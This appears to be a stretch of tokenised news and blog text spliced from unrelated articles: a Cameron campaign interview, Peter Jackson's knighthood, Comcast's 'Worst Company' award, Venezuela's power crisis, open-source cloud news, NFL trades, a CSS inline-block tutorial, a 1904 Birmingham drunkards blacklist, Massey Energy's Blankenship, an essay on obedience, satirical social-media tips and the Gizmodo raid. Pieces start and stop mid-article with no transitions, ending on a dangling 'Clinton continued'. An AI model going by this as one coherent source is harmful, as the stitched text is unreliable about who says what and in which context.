Normally , you guys are saying , ' Come on , where 's the news ?
Where 's the beef ? ' "
He claims it is " a very logical extension " of what his line has been all along : there should have been an election when Brown took over from Tony Blair : " It 's just the formalisation of something that I 've been saying for some time . "
There were changes of prime minister during both world wars : from Asquith to Lloyd George , and from Chamberlain to Churchill .
Under his proposal , there would have been snap elections in the middle of these conflicts .
The forehead furrows , then he rallies : " This is a proposal for the future , not the past . "
He adds that " in the modern world people feel rather cheated " if they have n't voted for the prime minister .
At the rally , he delivers his current stump speech , inveighing against the prospect of a hung parliament .
This is designed to drive voters to the Tories for fear of " the very real risk we'd be stuck with another five years of Gordon Brown " .
He also repeats his line that " the world wants to see Britain deal with its debts , get on and make decisions , avoid the jobs tax , get the economy moving .
I think all those things are more difficult with a hung parliament .
I accept that this is a challenge at the moment , because some people are seeing a hung parliament as a change . "
Indeed they are .
In some polls , as many as half of voters want to deny unfettered power to any single party .
We draw him into some debate about what the Tories would do if no single party had a majority .
" We would behave in a responsible way . "
What does that mean ?
He tries deflecting with a joke : " Obviously , it 's pretty clear that we would n't prop up a Labour government .
You can rule that one out . "
What he does not rule out is the possibility of coalition or some sort of other deal with the Lib Dems .
He declines several opportunities definitively to say no to it , sensibly hedging his bets in case Clegg does turn out to be the kingmaker .
And if the price was swallowing the Tories ' hostility to electoral reform ?
He begins by defending first - past - the - post .
" I want us to keep the current system that enables you to throw a government out of office , " he says .
But if it was the price of getting into power with Lib Dem support , he merely says : " We think this is an important issue . "
The Tory leader repeats the official denials that the Conservatives have had anything to do with attempts by some rightwing papers to smear the Lib Dem leader : " I 'm not responsible for what the newspapers write .
Many believe that the press attacks on Clegg have been counterproductive , offering further examples of the old politics against which people are revolting .
We put it to Cameron that the Tory press can be the Tory party 's worst enemy .
" Exactly . "
He reminds us that some of those papers have previously been less than flattering about him .
" I 've had plenty of battle scars from the Tory press .
I 've had four - page editorials having a go at me .
So before we write all this up as a conspiracy , I think we should have a deep intake of breath . "
Early in his leadership , Cameron made a concerted effort to woo liberal Britain .
His first newspaper interview as leader was with the Observer , in which he spoke a very different language to his predecessors ' about immigration , civil liberties and gay rights .
Since then , we put it to him , people initially attracted by that approach have become steadily more sceptical that his party is an appropriate home for their support .
He argues that it still is , and that " the modern liberal Conservative party " should be winning the support of " a liberally minded person who wants to get rid of identity cards , wants to give the environment a proper priority , education comes high up your list , and believes we should have a government that respects civil liberties rather than tramples on them .
One of the keys to this election is people who are broadly speaking small ' l ' liberal . "
Outbursts by prominent Tories – for instance , by his shadow home secretary , Chris Grayling – have fuelled scepticism that the Conservative party is anything like as modernised as the leader protests .
" I accept , if you take the issue of gay equality , I completely accept the Conservative party moved too late and too slowly , " he says .
" All conservative parties across the world have been on a journey and I would argue we 've gone a lot farther than others .
But do I think we should have gone farther and faster ?
Yes . "
Asked to confirm that Grayling will be home secretary if the Tories win the election , he wo n't : " I have not given blanket guarantees about jobs . "
Another source of unease – shared by some of his own frontbench – is the limited tax break for marriage that will go to just one in three couples and may seem unfair , offensive and discriminatory to single parents , stable families where the parents simply choose not to marry , and to the widowed .
How does he explain this policy to someone with a family whose spouse was killed fighting in Afghanistan ?
" No one is losing out from this tax break . "
Yes , they are , because somebody else is getting more .
" Well , you 're giving a tax advantage to marriage because marriage is a good institution .
There is tax relief in our system for taking a bicycle to work .
Are we discriminating against non-bicycle riders ? "
After this rather bizarre comparison , he gets back on track , arguing that it is " a very progressive policy " because the £ 3 a week will go only to people on basic rate tax with a low - or non-earning spouse .
He also extols his proposal to remove " the couple penalty " in the tax credit system .
" At the moment , if you get your girlfriend pregnant and move in with her , never mind whether you 're married or not , you are seriously penalised .
I 'm changing the system to remove the penalty against couples . "
He 's also sticking with the pledge to raise the inheritance tax threshold massively : " It was very popular and remains very popular , " he says .
He can't , however , guarantee that a Tory government would not raise VAT .
" We do n't want to .
We have no plans to . "
But … there 's a but .
" We 've never said you can rule out tax increases because it 's not a responsible thing to do . "
The occupant of the " love pod " is approaching his destination of the rally .
If he fails to win the election , will he quit as leader ?
He does n't want to go there .
But if he wins , he likes to suggest that he would n't overstay his welcome .
It is " definitely true " , he agrees , that both Thatcher and Blair stayed too long .
" Do politicians eventually go past their sell - by date ?
Yes , of course they do .
I 'm sure that Samantha would whisper in my ear at the appropriate time . "
He has to get over the threshold of No 10 to start with .
Given that so much seemed to point to a Conservative victory when this campaign began , if he fails to deliver his party will react with something louder than a whisper .
( CNN ) -- Peter Jackson , the Oscar - winning writer and director of " The Lord of the Rings " trilogy , was knighted in his native New Zealand .
The knighthood was conferred on Jackson on Wednesday for his services to film at a ceremony at the Premier House in Wellington .
New Zealand 's head of state Gov. Gen. Sir Anand Satyanand honored Jackson in place of Queen Elizabeth II .
New Zealand 's knights and dames are sanctioned by the queen , the country 's official head of state .
" The Lord Of The Rings " trilogy , which won 17 Academy Awards , including best director , adapted screenplay and best picture for Jackson for the final chapter , " The Return of the King , " was largely filmed in New Zealand and showcased the country 's natural scenery .
The project broke box - office records around the world and prompted a spike in tourism to New Zealand .
Jackson grew up in Pukerua Bay on the North Island of the country .
Jackson is currently working with Mexican director Guillermo del Toro on " The Hobbit , " a two - movie prequel to " The Lord of the Rings . "
" The Hobbit " is based on a book by author J.R.R. Tolkien .
Comcast ' wins ' Consumerist worst - company tournament
The votes are in , and Comcast has won Consumerist 's uncoveted " Worst Company in America " award .
The Philadelphia telecom firm beat runner - up Ticketmaster in the last round of voting by a margin of 59 to 41 percent -- ending a two - year losing streak that saw it crushed by AIG in 2009 and run over by Countrywide Home Loans in 2008 .
This year , Comcast faced a smoother road to victory in the NCAA - tournament - style competition of Consumerist , a snarky blog acquired by Consumer Reports at the end of 2008 .
Not even the personal lobbying of Comcast customer service director Frank Eliason in comments slowed its campaign .
( You may know Eliason on Twitter as " comcastcares " ; between that and his showing on Consumerist 's message boards , I think he 's more than earned a raise . )
Comcast 's less - " successful " rivals included fellow final four contenders Bank of America , Cash4Gold and Ticketmaster , plus 28 other companies ; all were nominated by Consumerist readers in March before voting kicked off a month ago .
As usual , the computing , telecom , airline and credit - card industries made strong showings .
For its troubles , Comcast gets a small sculpture that Consumerist describes as " the Golden Poo " and the dubious honor of being mentioned in stories like this .
Spokeswoman Jenni Moyer was a good sport when asked for comment ; instead of the usual tournament complaints about biased officiating , unfair seedings and Duke University , she e-mailed this statement :
We 're working everyday to improve our customers ' experiences with us , including offering a Customer Guarantee that 's backed by significant operational changes .
We 've taken steps over the past two years to improve our product reliability and service , and if a problem does occur , we work to quickly to resolve it , find the root cause and make changes so it wo n't happen again .
Our goal is to provide a consistently positive experience at every point in a customer 's relationship with us , and the Guarantee clearly outlines what we 're doing to hold ourselves accountable to live up to their expectations .
Would you have voted with the majority of Consumerist 's users ?
Second - guess or commend their decision in the comments !
Jose Vicente Rangel , chief propagandist of President Hugo Chavez , has laid out the regime ’s plan to explain the coming collapse of the national electricity sector .
The political opposition is “ preparing an electric coup ( that will be ) more lethal than the petroleum coup seven years ago , ” JVR says in Piedra de Tranca , a column he authors under the pseudonym Marciano .
The opposition also plans to assassinate President Chavez , he adds .
During the many years that JVR served Chavez first as foreign minister , then defense minister , and finally as Executive Vice President , he never failed to raise the specter of a “ magnicide ” at every Cabinet meeting in which he participated .
Over 20 former members of the Chavez regime ’s Cabinet ( over 100 have been ministers at one time or another ) have told Caracas Gringo that at every Cabinet meeting in which these sources were present , JVR always warned Chavez of plots by the opposition , Colombian paramilitaries , the CIA , etc. to kill the president .
And Chavez , who by nature is fearful and paranoid , always took JVR ’s warnings very seriously .
Now JVR is doing it again , but is linking his new warnings of presidential murder plots to an alleged plan to launch an electric coup .
Of course , as always JVR ’s warnings of conspiracies and coups come without any credible evidence to support his allegations .
JVR says in today ’s Piedra de Tranca column that an old friend , and apparently a former guerrilla , asked JVR “ what ’s up ” at a recent social gathering .
“ Something fat is moving , ” JVR replied , and then “ le eché el cuento ” which , of course , he does n’t share with the column ’s readers .
But JVR says that the “ empire ” ( i.e. USA ) and the “ opposition ” are “ desperate ” because they know the regime will be victorious in September ’s National Assembly elections .
The opposition “ knows it is going directly to the slaughterhouse , ” he adds .
Thus , the only possible option is “ magnicide ” – to clip the president – even though this implies a “ leap into the void ” for Venezuela .
But the CIA ca n’t do it because it ’s “ too burned , ” so an alternative intelligence agency has already been chosen .
Colombia ’s DAS ?
Israel ’s Mossad ?
UK ’s MI - 6 ( “ the name is Bond … James Bond ” ) ?
However , the “ conditions ” to clip Chavez must be perfect , and this means there must be more instability and social conflict .
How to create these conditions ?
Sabotage the electric sector , create more chaos , plunge Venezuela into the dark by destroying the national power grid , Marciano concludes .
JVR ’s column today is an explicit official admission that the Chavez regime knows its elaborate dog-and - pony show proclaiming effective “ conservation measures ” and major new power investments that will end the power crisis by next May amount to zilch .
The lights will go out in Venezuela , for a long time .
The power crisis will persist well beyond the 2012 presidential elections even if it rains biblically every day during the coming year .
And Venezuela ’s structural power crisis will not be the fault of the Chavez regime , but instead will be the result of sabotage by a disarticulated “ opposition ” without any resources or leaders which nonetheless never tires of conspiring with the feckless CIA , according to JVR .
IELO , Mandriva , and Nexedi this week joined forces and formed the Free Cloud Alliance , which will work to push open source products for cloud computing .
The Free Cloud Alliance was formed to show that companies can build a cloud - based infrastructure using open source products , according to Jean - Paul Smets , CEO at Nexedi .
The members also want to work toward cloud services that provide the same operational benefits offered by , for example , Amazon , but at the same time give users access to the source code and their data in its native form , Smets said .
" If you have access to the source code and your data in its native form you do n't run the risk of being locked in to one vendor , " said Smets .
The products offered by the Free Cloud Alliance include the NiftyName Virtual Datacenter and Block Storage Server from IELO ; Xtreem Storage Server from Mandriva ; Neo Storage Server and SLAP Cloud Engine from Nexedi ; and the OEM Platform from TioLive , a Nexedi subsidiary .
All the products are " free as in beer and free as in freedom , " according to the Free Cloud Alliance Web site .
Users get access to the source code and pay for enterprise support , if they need it .
NiftyName Virtual Datacenter provides a platform for anyone who wants to offer infrastructure as a service .
Site setup is provided for € 4,000 ( US $ 5,400 ) and enterprise support costs € 500 per node and year .
The SLAP ( Simple Languages for Accounting and Provisioning ) Cloud Engine is used to automatically share and manage server resources , which can be available on either virtual or physical servers .
Enterprise support costs from € 50 per year and server .
TioLive 's OEM
Platform can be used by companies that want to create an ERP ( enterprise resource planning ) or CRM ( customer resource management ) application and offer it as a service .
Enterprise support is available at € 5,000 per seat and year .
The Alliance is looking for more open source software publishers that want to become members .
To join they will need a strong belief in software freedom , just like the current members , said Smets .
The tiny Faroes team on brink of history
The Faroe Islands have had little to cheer on the European footballing stage but that could be about to change .
Boldin has been unhappy in Arizona , but he will join the recently acquired Donte Stallworth to bolster the Ravens ’ passing game .
Boldin is regarded as one of the N.F.L. ’s most physical receivers .
He was the offensive rookie of the year in 2003 .
He had at least 80 receptions for 1,000 yards in four of the past five seasons , but he requested a trade after the 2007 season when his Arizona teammate Larry Fitzgerald received a $ 40 million contract extension .
The Lions were active , too , with Coach Jim Schwartz arriving at defensive lineman Kyle Vanden Bosch ’s home minutes after free agency began and wooing the former Titan .
Schwartz was Vanden Bosch ’s defensive coordinator in Tennessee .
Vanden Bosch , a 31 - year - old pass rusher , has seen his numbers decline in the last two years ( 12 sacks in 2007 , 3 in 2009 ) but he is a respected veteran who will be critical in establishing Schwartz ’s system in Detroit .
The Lions are widely expected to take one of the top two defensive tackles  Gerald McCoy or Ndamukong Suh  with the second overall pick in the draft .
The Lions also signed Nate Burleson , who will be the No. 2 receiver behind Calvin Johnson .
In the meantime , the Redskins , with the new general manager Bruce Allen calling the shots , all but sat out the first day of the free - agency frenzy after cutting 10 veterans from their roster in a massive housecleaning Thursday .
Within hours of free agency ’s opening last year , the Redskins had signed Haynesworth and DeAngelo Hall to large contracts .
But perhaps chastened by the results of years of uncontrolled spending  four wins in 2009 and the firing of Coach Jim Zorn  the Redskins changed course .
The Jets can not be too active in free agency because they were one of the final four teams in 2009 .
So they filled one of their biggest needs with a trade , sending a third - round pick to the Chargers in exchange for cornerback Antonio Cromartie .
And , barring any last - minute change , safety Kerry Rhodes will remain with the Jets next season and receive his $ 2 million roster bonus next week .
Rhodes has four years remaining on his contract , but his benching last season , due to issues with defensive assistant coaches , led to speculation that he would be traded or released .
States of America One Photographer 's Look at Social Dislocation
He was looking for adventure .
But when the young Dane Jacob Holdt arrived in the US in the 1970s , he found a country deeply divided -- and spent the next five years photographing that divergence .
His photos , now on display in Braunschweig , show a haunting America .
If you ’ve been developing with CSS for some time now , you ’re certainly familiar with the inline - block value for the display property .
The most common use for this property / value pair is when getting IE6 ’s margins to behave .
To briefly explain what I ’m talking about , if you float an element in IE6 and give it a margin setting on the same side as the direction of the float , the margin will ( strangely ) be doubled .
You could fix this with an IE6 hack with a margin setting that ’s half the value of the original , or you could ( in many cases ) give the element ’s display property a value of inline - block ( again in an IE6 - only hack or stylesheet ) .
This will resolve the issue in most , if not all circumstances .
Although this IE6 workaround for floated elements has probably been the most useful way to implement the inline - block value , it could serve a much more legitimate purpose if the value itself is better understood .
How is it Defined ?
Here are some definitions for the inline - block value , as taken from some noteworthy sites :
According to Sitepoint ’s CSS Reference :
inline - block makes the element generate a block box that ’s laid out as if it were an inline box .
According to QuirksMode :
An inline block is placed inline ( ie. on the same line as adjacent content ) , but it behaves as a block .
According to Robert Nyman :
Basically , it ’s a way to make elements inline , but preserving their block capabilities such as setting width and height , top and bottom margins and paddings etc .
I think I like Nyman ’s definition best , because it makes the value seem much more practical .
A Demonstration
Here is an image demonstrating inline - block , so you can see exactly how it would behave :
How Can it Be Used ?
Here are some reasons you might want to use inline - block :
To fix the IE6 double - margin bug on floated elements ( as described above )
To place multiple block - like elements on the same horizontal line without floating them
To allow an inline element to have width and / or height while still remaining inline
To allow an inline element to have padding or margins
Some Things to Note
If you use inline - block there are some important factors and drawbacks to keep in mind .
An inline - block element is white - space dependent , so if you display list items using inline - block ( in a navigation bar , for example ) , the list items will have unwanted space next to each other .
To remove the space , you ’ll have to remove from your HTML code any whitespace that occurs in between the list items .
So your list item code would look like this :
< ul > < li>
Item One</li>< li> Item Two </ li>< li> Item Three </ li>< li> Item Four </ li>< li> Item Five </ li > </ul >
Or even worse :
< ul > < li> Item One </ li >< li> Item Two </ li >< li> Item Three </ li >< li> Item Four </ li >< li> Item Five </ li > </ul >
That issue could evidently be resolved by adding font - size : 0 to the < ul > element , or something similar , then increasing the font size for the list items .
But those solutions are messy , so I would recommend instead trying a solution that does n’t use inline - block .
Also , if you declare a number of elements using inline - block and the elements have varying heights , you will probably have to add something like vertical - align : top to ensure their alignments are not staggered .
Here is an interesting page that displays some of these and other quirks that occur with inline - block in different circumstances .
Finally , I found in my experiments that inline - block did n’t work exactly the same when the inline - block element occurred inside of text that was inside of a paragraph element .
Is it Cross - Browser ?
Binge Britain 1904 : The rogues ' gallery that shows war on booze is nothing new
Advertisement
Angry , bewildered and shame - faced these Edwardian drunks stare into the lens of the police camera .
They were ' habitual drunkards ' whose offences included being caught while in charge of a horse , carriage and even a steam engine .
Issued a century ago , the drunks were given the equivalent of modern - day Asbos in that they were banned from being served in pubs because of their past behaviour .
Information was compiled by the Watch Committee of the City of Birmingham , which was set up by the police to enforce the Licensing Act of 1902 .
The act was passed in an attempt to deal with public drunks , giving police the power to apprehend those found drunk in any public place and unable to take care of themselves .
This drunk on the left was James Doyle , a labourer , whose report listed ' peculiarities ' such as having two scars on his right forearm and a ' crossed right eye ' .
He was convicted of being drunk and disorderly in a public house in 1904 .
Alice Loxley on the right had a crippled left hand
The list featuring these drunks was distributed to 250 pub landlords managed by the Holt Brewery .
The report included photos and descriptions of ‘ habitual drunkards ’ who were not to be sold alcohol due to their reputation and past crimes .
Similar lists were created for cities across the country and were commonly distributed by the area ’s major brewery .
People were placed on the list after receiving four convictions under the Inebriates Act of 1898 , which included being ' intoxicated to the point of complete incompetence ' and ' being found in a shebeen ' – an illicit bar that sold alcohol without a licence .
Richard ‘ Dirty Dick ’ Flemming ( left ) – also listed with the alias ‘ Dick the Devil ’ .
He was sentenced on February 20 , 1903 for being drunk and disorderly , receiving 21 days of hard labour .
He is described as 5ft 2in with a slim build and pug nose .
Tamar Edwards on the right was given seven days of hard labour
Other offences included riding a horse whilst under the influence or drink - driving a steam engine .
Each drunkard ’s entry includes photographs ( front and profile views ) , their name , alias , residence , employment , physical description , distinguishing marks , nature of conviction and the sentence received .
The detailed description also lists distinguishing marks such as tattoos and scars , and their professions , including prostitutes , ‘ bedstead polishers ’ , ‘ hawkers ’ , and even ‘ grease merchants ’ .
The collection only exists today because the brewery kept hold of them and the Black List has now been published online for the first time by ancestry .
co.uk .
Eliza Fallon ( left ) : She was a 38 - year - old ‘ woodchopper and prostitute ’ who was put on the blacklist after being found heavily intoxicated on numerous occasions in 1904 .
She is noted as having a scar on the left side of her nose and the right side of her neck .
Alice Tatlow ( right ) :
She was a 25 - year - old ‘ polisher and prostitute ’ and was convicted for drunk and disorderly behaviour in January 1904 .
She is noted as having a number of distinguishing tattoos including Prince of Wales ’ feathers on her right hand and a heart and clasped hands with ‘ true love KB ’ on her right arm
Ancestry 's Dan Jones said : ' Although it is a small collection , the Black List paints a fascinating picture of some of Birmingham ’s most debauched characters from the turn of the last century and we hope to compliment it with similar lists from other cities in the future .
' The detail in these records is incredible , featuring photographs as well as physical descriptions meaning anyone with an ancestor in the collection will find out a great deal about them , whilst others can uncover compelling information about forgotten members of society who were down on their luck or perhaps spending their good fortune in unwise ways . '
Anyone looking for a black sheep in the family could also find their ancestor within the England & Wales Criminal Registers , 1791 - 1892 online at Ancestry.co.uk , which feature registers for all 1.4 million criminal trials which took place in England and Wales from the late 18th to the late 19th centuries .
Matthew Moran is pictured here at 32 years old and is described as a ' tube drawer ' while ' bedstead polisher ' Charlotte Humphries was described as having ' sores on her cheek '
' Sallow ' groom William Hughes ( left ) , 61 , had a ' twitching of face ' while 37 - year - old labourer William Tustin was , unusually for this gallery , devoid of peculiarities
Thomas Riley ( left ) was also known as ' Young Punch ' while 62 - year - old boot manufacturer Walter Harrison is described as ' ruptured '
Charwoman Minnie Osborne had a broken nose and was ' subject to fits ' while Thomas Wall was said to have a scar across his nose
' Pock - pitted ' Harry Davies ( left ) had a number of crippled fingers and Joseph Allsopp had tattoos of a tree in a flower pot and a bust of a woman
Hawker George Allen had a cut scar down the left side of his nose while 44 - year - old charwoman Emily Jane Parrish had one on her forehead
Eliza Cowley , 26 , was a charwoman and prostitute and David Addicott was a canvasser - both had scars on their faces
Prostitute and charwoman Mary Cooper and Benjamin Bloxsidge , a boatman
Apr. 8 , 2010  -- Don Blankenship , CEO of Massey Energy , has long had a lot of influence in West Virginia .
The top executive of the company that owns the mine where 25 miners died this week looms large in state affairs both because of Massey 's economic importance and because of his own penchant for political bluster .
But in 2009 , the U.S. Supreme Court decided Blankenship might be wielding too much influence , after he spent $ 3 million of his own money to get a judge elected to a West Virginia court that was ruling on a Massey - related case .
As detailed in an ABC News investigation , Blankenship vacationed on the Riviera with one West Virginia Supreme Court Justice and underwrote an ad campaign supporting the election of another while a $ 50 million judgment against Massey Energy was before the court .
Blankenship 's apparently successful multi-million - dollar attempt to change the composition of the court became the basis of a landmark U.S. Supreme Court decision -- and the source of a slew of controversial television ads .
" Don Blankenship prides himself on being tough and talking tough , " said David Fawcett , a Pittsburgh attorney who has tangled with Blankenship more than once .
" He 's tried to take that tough guy approach into the political and judicial arenas . "
In 2002 , Fawcett helped win a $ 50 million judgment against Massey in a West Virginia court for several smaller mining companies who claimed that Massey Energy had driven them out of business by defaulting on contracts and committing fraud .
Two years later , as Massey was appealing the verdict , Blankenship spent about $ 3 million on campaign ads meant to knock Justice Warren McGraw off the West Virginia Supreme Court .
The commercials accused McGraw of " letting a child rapist go free " and of being too " radical " for West Virginia .
McGraw lost the 2004 election by six points to challenger Brent Benjamin .
While Blankenship contributed only a small sum to Benjamin 's campaign , he was the principal funder of a political action committee called For the Sake of the Kids that produced the attack ads against McGraw .
( Blankenship had less success in 2006 , when he spent millions more of his own cash trying to oust Democrats from the state legislature .
Democrats gained six seats instead . )
In 2008 , four years after Benjamin 's election , the West Virginia Supreme Court finally ruled on the appeal of the $ 50 million verdict in the case known as Caperton v. Massey .
Justice Benjamin refused to recuse himself from the case , and twice provided the deciding vote in Massey 's favor .
The jury verdict against Massey was overturned .
A second state Supreme Court justice who initially voted to overturn the Massey verdict later recused himself from the case after pictures surfaced showing him on vacation with Blankenship .
Elliott " Spike " Maynard was seen in timestamped photos with Blankenship apparently taken on three successive days in Monaco while Caperton v. Massey was before the court .
When an ABC News reporter attempted to question Blankenship about the Maynard photos , and his personal relationship with West Virginia 's Supreme Court justices , he issued a warning before grabbing the reporter 's camera and shoving him .
" If you 're going to start taking pictures of me , " said Blankenship , " you 're liable to get shot . "
WATCH VIDEO OF THE CONFRONTATION HERE
The plaintiff appealed the West Virginia Supreme Court 's decision in Caperton v. Massey to the U.S. Supreme Court .
In 2009 , the Supreme Court ruled in favor of the plaintiff , saying that Blankenship 's role in Benjamin 's election to the court created an appearance of bias , whether or not there was any real bias .
Justice Anthony Kennedy noted that the money spent by Blankenship to defeat McGraw was " more than the total amount spent by all other Benjamin supporters , and three times the amount spent by Benjamin 's own committee . "
While the court has lately been loosening restrictions on campaign financing , its decision in Caperton v. Massey attempted to place limits on the role of money in judicial elections .
In 2009 , the West Virginia Supreme Court again took up Caperton v. Massey - and again decided in Massey 's favor , this time by an even larger margin , 4 to 1 .
Brent Benjamin , as directed by the U.S Supreme Court , recused himself .
The long legal battle , meanwhile , and Don Blankenship 's long shadow in West Virginia , became the basis for John Grisham 's novel " The Appeal . "
And Blankenship is now channeling his political activism into his Twitter account .
Asked for comment Wednesday , Massey spokesman Jeff Gillenwater said the company was devoting its attention to rescue efforts , and that Blankenship was meeting with families of miners and with government officials .
Click Here for the Blotter Homepage .
Image via Wikipedia
There is a particular trend in German society , a kind of unwritten rule which says that people should follow laws and state orders uncritically and far too many Germans do this , to the degree that one can even say that they are characterized as a society by this unquestionable obedience .
Pedestrians for example follow traffic lights to the second .
A typical German will not cross the street until the little green man appears , even if the street is completely empty for a km in either direction .
They claim that this is to give the good example to children but then again , they will act like this even if no children are around .
A cyclist will wait on the red light , even if the green pedestrian light of the direction he is riding , is on .
Even worse , when the green light is on , people start walking without even looking .
They just assume safety .
This behaviour is not isolated in traffic of course but permeates almost every aspect of life .
From state laws to rules of etiquette to even personal behaviour .
If there ’s a rule , it must be followed as closely as possible .
And to make matters worse , when someone does not follow the expected behaviour , many Germans , especially the older generations , will take it upon themselves to scold and complain in an attempt to set them back on the “ right track ” .
This post is not to complain about Germans and Germany of course , not to paint them in a broad brush as there ’s quite a few that rightly dislike and rebel against this behaviour .
Germans simply provided me with the insight into something else ; an interesting side - effect of this excessive obedience to laws and rules that I ’ve noticed ; it is making people behave in a weird way , a way that I can only label as stupid .
It seems to me that an unquestioned acceptance of authoritarian orders makes people ’s own individualism atrophy , it strips them of the capacity to decide for themselves which course of action to take which in turn makes them afraid of making their own decisions and taking responsibility for them .
Better to defer to authority and absolve yourself in the hierarchical chain of command .
If , as a car driver , you drive with a green light and you end up hitting a pedestrian because you could n’t break quickly enough or you were n’t looking anywhere except the light , it ’s their fault .
If , as a soldier , you are ordered to shoot some civilians , then you ’re “ just f0llowing orders ” .
If , as a insurance worker , you deny coverage because of a technicality , then you ’re just following the rules .
And so on .
When you stop thinking and constantly judging your own actions on their own merits then you simply can end up committing the worst actions because you feel no responsibility for them .
Atrocities do not happen because everyone found them proper .
They happen because everyone just kept following orders .
Without thinking .
Without looking at the greater picture .
And the worst part is not simply how many mistakes people will do if they feel irresponsible , but how much it affects their underlying mentality , twisting the understanding of authority .
Instead of thinking that someone is in power because they need to be able to do the right thing , they start to believe that someone is doing the right thing , because they are in power .
Power does not only corrupt the minds of those exerting it , but just as much the minds of those respecting it .
While those below become thoughtless drones , sluggishly trying to avoid any and all work and creativity , those above have to compensate for this and thus start to consider themselves superior , more intelligent and worthy or their position and authority .
It a vicious self - perpetuating circle .
This is why authority in all its forms should always be challenged .
Many times , it will be defensible , such as authority from knowledge or wisdom .
The authority a carpenter has over wood making practices or the accountant over record keeping .
But most often than not , it has no true basis in reality .
The boss ’ and manager ’s authority does not rely in them being smarter , more productive or being able to make others more productive .
The politician ’s authority does not rely on them being more capable of creating the rules for thousands , if not millions of others .
The Judge ’s authority does not rely on them being more impartial .
And while those arguments will be used as the reason , they are not based on evidence but on theory , articles of faith and “ lesser - evil ” fallacies .
Such authority need to be challenged in all its forms .
The worker should challenge the boss ’ orders , vocally if possible but silently when not , and decide for themselves how they can work productively .
The soldier should challenge their orders and follow them only if they stand on their own merit , regardless of nationalist and religious rhetoric .
The pedestrian should challenge the law of the street and take it as a guideline , not an order .
I ca n’t drive a car , but I do drive a bicycle and I keep crossing red lights all the time .
Red and green are for me only an indication and my true decision rests in my own eyes and ears .
A red light will be crossed when the street is clear and a green one will be waited when I do n’t feel secure .
These actions are not simply petty rebellion but simple rational common sense .
There will be little consolation to me if someone gets punished for breaking my spine for crossing a red light and I ’d rather die than be like those Germans I saw a few months ago which where waiting at an ( obviously broken ) red light for 5 minutes more after I ’d had enough and crossed the street ( and that is just until they left my vision ) .
Just stuck there , cars and pedestrians , apparently not knowing what to do when trapped in a red light prison of their own blind obedience .
Spread the love : Email
Reddit
More
Facebook
Twitter
WhatsApp
Tumblr
Want to grow your organic traffic by 20 - 100 % ?
We built ClickFlow , a suite of SEO tools designed to increase your organic rankings and scale qualified traffic for your website .
Click here to learn more and get started .
Start a blog , and then abandon it .
Better yet , post vigorously for a few months , then pause for a few months , then write a post that apologizes for not writing in a while …and then let that last post represent you for a couple more years .
Keep people guessing by having at least four different avatars across your networks .
This makes you seem mysterious and intriguing .
Post to every forum you can find with off - topic , off - putting link drops .
Advertise diamond jewelry on car repair forums , pharmaceuticals on home décor sites , and luxury travel on sites devoted to frugal living .
This is a rock - solid strategy .
All your comments on other people ’s blogs should be modeled after this : “ Love your blog .
Buy a luxury watch . ”
Threaten to sue Yelpers and others who leave you negative reviews .
They love that .
It ’s so much more constructive than respectfully adding your own comments or offering some sort of compensation for a bad experience with your business .
Post as much potentially offensive stuff as you can .
It really gets people ’s attention , so you should never post any other type of content .
Hey , if your college buddy Joe thinks it ’s ok , it must be ok .
Joe says he always thinks about what his mother would say if she saw it , and remember : Joe ’s mom is as high as a kite 22.5 hours per day .
Also , never put an NSFW label on the good stuff : that ’s for nerds who care if their boss is looking over their shoulder .
Never collaborate with anyone or do any favors for anyone else .
They ’re just out to get you .
Content wants to be free .
Steal other people ’s content and pass it off as your own .
Be a troll .
Also : feed the trolls .
Respond defensively whenever possible .
Tell those mean trolls to stop kicking sand in your face .
If you attract more trolls , you ’re succeeding brilliantly !
Link to utter crap that your friends tell you to link to .
( “ Make Millions Online with a Plastic Emu! We ’ll Tell You How . ” )
Have no sense of humor .
Better yet , have only a sarcastic sense of humor .
Tear other people down as much as you possibly can , and never say anything nice .
This will prove that you are invulnerable , and everyone will respect you .
Only submit your own stuff to social bookmarking sites .
Especially when all your pieces have titles like “ 121 Insurance Companies You ’ll Love ” or “ 8 Reasons to Buy a Cheap Designer Handbag Now . ”
Come to think of it , here ’s another great tip : write more pieces like that .
Better still , have a computer write them for you .
As long as you have the optimal keywords in your piece , nothing else matters .
Get banned from your favorite social media sites .
Then go start your own .
You just need a catchy one - word brand name ( or , two words conjoined in some sort of cutesy way ) , and a clean , minimal user interface , preferably involving the color green because it reminds people of good things , like trees and fresh air and money .
Then just submit your stuff and wait for the votes to roll in .
Remember : Twitter is useless .
Facebook is just for pictures of your friends ’ dogs and posts about what you ate / drank / bought because of an infomercial .
Be sure to show off your vocabulary , and write in lengthy paragraphs with as little white space as possible .
Never include an image or a list of bullet points or anything else that would break up your delicious , delicious text , which is as dense as last year ’s holiday fruitcake .
Put “ SEO ” somewhere in your username .
Digg users especially will love you and may even ask to marry you and bear your children if you do this .
Yup , even though the majority of them are men .
Know your audience .
Completely ignore and belittle demographics that do n’t use social media .
You do n’t need them .
Plus , it ’s not like they have friends or relatives or anything .
Ignore everything else about your online presence besides social media .
Geotargeting , the mobile web , and site usability are mere details — there ’s no need to concern yourself with them .
Definitely do not monitor what people are saying about you .
Just stick your fingers in your ears and sing “ La la la la . ”
Assume everything that people can find about you online is favorable .
Do not , under any circumstances , engage in conversations about your products or services .
By the way , Friendster is the newest hot social media site .
See you there !
Want ways to successfully use social media ?
You should follow Single Grain on Twitter , or subscribe to our RSS feed .
At a certain point , you have to admit you are n’t good enough to do something better than an expert could do it even if the technical option exists for you to give it a shot anyway .
While people will tolerate a lot of things , what we want are beautiful things that work well .
There are n’t many nonexperts who can accomplish that .
Expertise needs schooling , maturation , taste , and quite a lot of attitude .
The foregoing explains why open source has nothing to teach literature or indeed any artistic creation , since talent does n’t scale as you give more and more developers check - in access to the version - control system set up for your novel .
It further explains why one ’s inability to hack an iPad means precisely nothing .
Nobody needs to program an iPad to enjoy using it , except those who have no capacity for enjoyment other than programming and complaining about same .
This was the weekend those of us with high standards lost their remaining residue of patience for ideologues who hyperbolize about open systems without actually creating something people want to use .
Last Friday night , California 's Rapid Enforcement Allied Computer
Team entered editor Jason
Chen 's home without him present , seizing four computers and two servers .
They did so using a warrant by Judge of Superior Court of San Mateo .
According to Gaby Darbyshire , COO of Gawker Media LLC , the search warrant to remove these computers was invalid under section 1524 ( g ) of the California Penal Code .
Here is all the documentation ( Jason Chen 's personal details are pixelated ) .
Search Warrant
Advertisement
Advertisement
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Inventory of seized material
Advertisement
Gawker 's legal response to the police
Advertisement
Jason
Chen 's account of the events
Advertisement
Since this is a legal issue and we can't respond to comments , we are turning them off in this post
Clinton continued :
